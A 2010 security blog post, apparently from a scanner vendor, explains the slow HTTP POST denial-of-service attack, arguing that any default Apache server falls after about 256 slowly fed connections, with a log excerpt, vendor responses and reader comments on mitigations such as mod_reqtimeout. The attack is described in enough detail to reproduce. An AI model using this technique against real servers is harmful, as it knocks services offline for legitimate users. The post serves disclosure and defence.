HTTP Post Denial Of Service: more dangerous than initially thought

Wong Onn Chee and Tom Brennan from OWASP recently published a paper* presenting a new denial of service attack against web servers.

What’s special about this denial of service attack is that it’s very hard to fix because it relies on a generic problem in the way HTTP protocol works. Therefore, to properly fix it would mean to break the protocol, and that’s certainly not desirable. The authors are listing some possible workarounds but in my opinion none of them really fixes the problem.

The attack explained

An attacker establishes a number of connections with the web servers. Each one of these connections contains a Content-Length header with a large number (e.g. Content-Length: 10000000). Therefore, the web server will expect 10000000 bytes from each one of these connections. The trick is not to send all this data at once but to send it character by character over a long period of time (e.g. 1 character each 10-100 seconds). The web server will keep these connections open for a very long time, until it receives all the data. In this time, other clients will have a hard time connecting to the server, or even worse will not be able to connect at all because all the available connections are taken/busy.

In this blog post, I would like to expand on the effect of this denial of service attack against Apache.

First, I would like to start with one of their affirmations:

“Hence, any website which has forms, i.e.
accepts HTTP POST requests, is susceptible to
such attacks.”

At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not.
Any Apache web server is vulnerable to this attack. The web server doesn’t decide if the resource can accept POST data before receiving the full request.

I’ve created a very simple Acunetix WVS test script to reproduce this attack and prove this point:
The script will create 256 sockets, establish a TCP connection to the web server on each socket and start sending data slowly (1 character per second).

As you can see in the code from the screen-shot, I’m making a HTTP POST request to an nonexistent file (POST /aaaaaaaaaaaa HTTP/1.1). After a few seconds, the web server becomes completely unresponsive. As soon as I stop the script, the web server starts responding again.

Therefore, any Apache web server is vulnerable to this attack.

How many connections are required until the web server stops responding?

Their paper mentions 20.000 connections as an example. They also make the following note:

Apache requires lesser number of connections
due to mandatory client or thread limit in
httpd.conf.

Interesting. How much lesser number of connections?  If we look in the Apache 1.3 documentation, we find the following information:

The MaxClients directive sets the limit on the number of simultaneous requests that can be supported; not more than this number of child server processes will be created.

Syntax: MaxClients number
Default: MaxClients 256

Therefore, by default Apache 1.3 only allows 256 connections. Therefore, an attacker only needs to steal 256 connections before the web server stops responding. It’s the same situation even with Apache 2.0.

During my tests, I noticed the following error message in the Apache error log:

$tail -f /var/log/apache2/error.log

[Mon Nov 22 15:23:17 2010] [notice] Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g configured — resuming normal operations
[Mon Nov 22 15:24:46 2010] [error] server reached MaxClients setting, consider raising the MaxClients setting

In conclusion, the denial of service attack affects any Apache web server and one requires only a few hundred connections to make the server completely unresponsive. And based on my knowledge there is no proper fix for it:

Apache response was:

“What you described is a known attribute (read: flaw) of the
HTTP protocol over TCP/IP. The Apache HTTP project declines to treat this
expected use-case as a vulnerability in the software.”

And Microsoft’s response:

“While we recognize this is an issue, this issue does not meet our
bar for the release of a security update. We will continue to track this issue
and the changes I mentioned above for release in a future service pack.”

That’s pretty scary!

* The paper published by Wong Onn Chee and Tom Brennan can be found here.

Share this post
  • “At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not.
    Any Apache web server is vulnerable to this attack.”

    This isn’t necessarily true. If you’re using apache to just serve static files, apache won’t accept POST requests to URLs that map to those files, it’ll return error 405: Method Not Allowed.

    Of course, you’re right in the fact that if you’re serving any kind of dynamic content, like say a PHP file, Apache will happily accept any POST request.

    • @Mike As you can see in the source code, I’m posting to an inexistent file (POST /aaaaaaaaaaaa) – not to a PHP file. How do you configure apache to just serve static files? I’ve commented out “AddType application/x-httpd-php .php .phtml .php3″ and “LoadModule php5_module /usr/lib/apache2/modules/libphp5.so” and the attack still works as usual.

  • You obviously have not looked over mod_reqtimeout which has been available since 2.2.15 I think. If you are still using 1.3, after 12 and a half years, maybe it is time to “get with the times?” If you are using the new 2.0.64, it may be the last as well for 2.0 so again maybe it is time to “get with the times?”

    mod_reqtimeout may not be the answer, but looking at what you’ve discussed here, it should do the trick.

    Obviously the attacker can tune timing, but at a certain point it’ll become moot since the attacker will be sending enough data fast enough.

    I may be wrong, but that is how I see it.

    • @Gregg I’m not using Apache 1.3. The Apache 1.3 documentation just happened to be the first hit when looking on Google for MaxClients. But, yes. I didn’t checked mod_reqtimeout. Thanks, will check it out.

  • How is this in any way a new attack? The DoS vectors for HTTP are all well-known, and you can perform the exact same attack using character-by-character GET requests to overload the servers. Sure the payload is smaller, but you can magnify it with concurrency.

  • I don’t think it requires changing the standard, can’t a web server just close the connection and error out under one of these conditions:
    a) Content length too large (Say, 20MB could be tunable depending on the context)
    b) Upload speed too slow (Say, less than 1KB/s)

  • Interesting to note that this is only a DOS attack for threaded servers – an async webserver such as nginx and lighttp avoid this altogether (or at least have a much higher fail number), as the overhead for a long connection is minimal.

  • @Chris: with IPv6, it won’t be unheard of for a user having access to 64bits (or more!) worth of IP space. A well crafted script running on IPv6 could easily create a single IP per socket to use.

  • Thanks a lot author , it is really a Big flaw if there’s No proper fix for it ,,, i want to create a PHP script to test it .

  • Leave a Reply

    Your email address will not be published.


    *